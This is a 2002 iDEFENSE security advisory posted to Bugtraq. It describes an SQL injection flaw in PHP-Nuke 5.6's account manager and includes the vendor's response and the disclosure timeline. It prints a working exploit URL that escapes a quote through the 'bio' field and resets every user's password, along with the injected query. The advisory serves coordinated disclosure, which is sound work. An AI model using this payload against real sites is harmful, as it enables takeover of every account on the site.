From dendler@idefense.com Sat Nov 2 01:50:18 2002 From: David Endler To: bugtraq@securityfocus.com Date: Thu, 31 Oct 2002 21:26:21 -0500 Subject: iDEFENSE Security Advisory 10.31.02c: PHP-Nuke SQL Injection Vulnerability -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDEFENSE Security Advisory 10.31.02c: http://www.idefense.com/advisory/10.31.02c.txt PHP-Nuke SQL Injection Vulnerability October 31, 2002 I. BACKGROUND "PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases." More information is available at http://www.phpnuke.org. II. DESCRIPTION PHP-Nuke is susceptible to an SQL injection attack that allows an attacker to modify a user's table to his or her liking. It is possible for any registered user of the target system to launch this attack by feeding certain unfiltered characters to the account manager module. The attacker can target a specific user or all system users at once. The key is the ability to insert a backslash into the "bio" field, thereby escaping a quote and leaving the SQL query open for injection. The following example will modify every PHP-Nuke users password to "1.": Exploitation requires that the attacker log on, enter the account manager and determine his or her UID through the source of the page. If the attacker's UID is 2, he or she can then launch the attack by requesting the following URL: modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage= no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/* The injected query is constructed as follows: UPDATE nuke_users SET name = '', email = '', femail = '', url = 'http://', pass = 'xxxxx', +--[ bio = '\', | user_avatar = '', | user_icq = '', | user_occ = '', | user_from = '', | user_intrest = '', | user_sig = '', | user_aim = '', | user_yim = '', | user_msnm = '', +--[ newsletter = ', bio=0,pass=md5(1)/*' WHERE uid='2' The marked area is all treated as a value to store into bio. The "where" clause is commented out, leaving an update statement that updates the entire table (ie: all users) to having a password of MD5(1). III. ANALYSIS Exploitation allows an attacker to compromise any other system account, thereby gaining the privileges and identification of the compromised account. The attacker can also corrupt the entire user's table, effectively denying service to legitimate users. IV. DETECTION iDEFENSE Labs successfully tested and exploited this vulnerability in PHP-Nuke 5.6, Unix version. As the described exploit is dangerous in nature, administrators should not test in a production environment. V. VENDOR FIX The author, Francisco Burzi, responded: "PHP-Nuke version 6.0 is not vulnerable to the SQL injection attack... Latest version is 6.0 and 6.5 under development. Old versions doesn't have support of any kind, all bugs and security fixes apply in the new versions. So, the solution to this security hole is to update the software from 5.6 to 6.0 version." VI. CVE INFORMATION The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the identification number CAN-2002-1242 to this issue. VII. DISCLOSURE TIMELINE 09/17/2002 Issue disclosed to iDEFENSE 09/23/2002 Author notified through submission form 09/23/2002 iDEFENSE clients notified 10/01/2002 iDEFENSE second attempt at PHP-Nuke contact 10/20/2002 iDEFENSE third attempt at PHP-Nuke contact 10/31/2002 Response from Francisco Burzi (nukelite@users.sourceforge.net) 10/31/2002 Coordinated Public Disclosure VIII. CREDIT kill9 (kill9@hackers.com) is credited with discovering this vulnerability. Get paid for security research http://www.idefense.com/contributor.html Subscribe to iDEFENSE Advisories: send email to listserv@idefense.com, subject line: "subscribe" About iDEFENSE: iDEFENSE is a global security intelligence company that proactively monitors sources throughout the world ^× from technical vulnerabilities and hacker profiling to the global spread of viruses and other malicious code. Our security intelligence services provide decision-makers, frontline security professionals and network administrators with timely access to actionable intelligence and decision support on cyber-related threats. For more information, visit http://www.idefense.com. - -dave David Endler, CISSP Director, Technical Intelligence iDEFENSE, Inc. 14151 Newbrook Drive Suite 100 Chantilly, VA 20151 voice: 703-344-2632 fax: 703-961-1071 dendler@idefense.com www.idefense.com -----BEGIN PGP SIGNATURE----- Version: PGP 7.1.2 Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A iQA/AwUBPcHlgUrdNYRLCswqEQLGcwCdH27Ssm5+bhXyONfPn7uE+hk/gckAoOKJ IbcubmZUdFwWk9wRDlyT3kFj =FWej -----END PGP SIGNATURE-----